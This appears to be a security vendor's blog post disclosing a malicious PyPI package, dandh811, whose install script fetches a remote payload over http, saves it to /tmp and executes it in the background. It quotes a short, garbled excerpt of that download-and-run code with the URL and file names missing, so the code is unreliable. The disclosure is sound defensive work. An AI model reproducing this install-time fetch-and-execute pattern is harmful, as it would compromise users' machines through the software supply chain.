Another malicious Python package discovered

Reported Jan 04, 2022 by Ashish Bijlani

downloads payload over http during installation malicious


28 Feb, 2021
PyPi Versions 10
Deps 1

Our static analysis module flagged package dandh811==0.0.10 as suspicious. So we decided to take a deeper look at the code, particularly the statements that were flagged by our technology as "risky". Upon further review we found that the package is indeed fishy! Here we discuss our findings.

At Ossillate, we are building a large-scale security analysis platform to vet PyPI Python packages for software supply chain attacks. Our free CLI and CI/CD tools can help developers adopt pre-vetted third-party open-source packages and ship faster.

Our technology-generated report shows that the package
- homepage redirects to,
- uses network, file, and subprocess APIs in


Show details

As contains the code that is executed immediately upon installation of a package, it is clear that the package trying to download a malicious payload from a remote server.

    handler = urllib2.urlopen("")
    with open("/tmp/", "wb") as fp:
        fp.write(["python2", "/tmp/"])

Fig 1. downloads and executes a payload at runtime

Fig 1 above shows an excerpt from file. As seen, it first downloads a malicious payload sectest/package/pypi/download over insecure http channel. The payload is saved as /tmp/ and executed it as a background process during the installation process.

We tried downloading the payload manually from, but the server was not reachable. shows that this server is located in China.

We reported our findings to PyPI maintainers, and they have yanked this package as of Jan, 2022.